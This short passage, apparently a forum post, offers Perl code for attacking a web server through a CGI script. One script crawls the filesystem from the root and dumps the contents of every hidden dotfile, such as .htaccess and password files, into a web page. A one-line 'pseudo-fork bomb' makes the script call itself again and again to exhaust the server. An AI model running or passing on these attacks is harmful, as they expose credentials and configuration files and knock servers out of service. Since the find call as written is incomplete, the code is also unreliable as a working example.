Assuming the webserver chroot's successfully, there's always the .ht* finder:

use File::Find;
find('/');

sub wanted {
    if (/^\.\w/) {
        print "$File::Find::name<p>\n<pre>";
        @ARGV = $File::Find::name;
        print while (<>);
        print "</pre><p>\n";
    }
}
[download]

There's also a pseudo-fork bomb, which may or may not go over well: system($0, "foo=". param($name));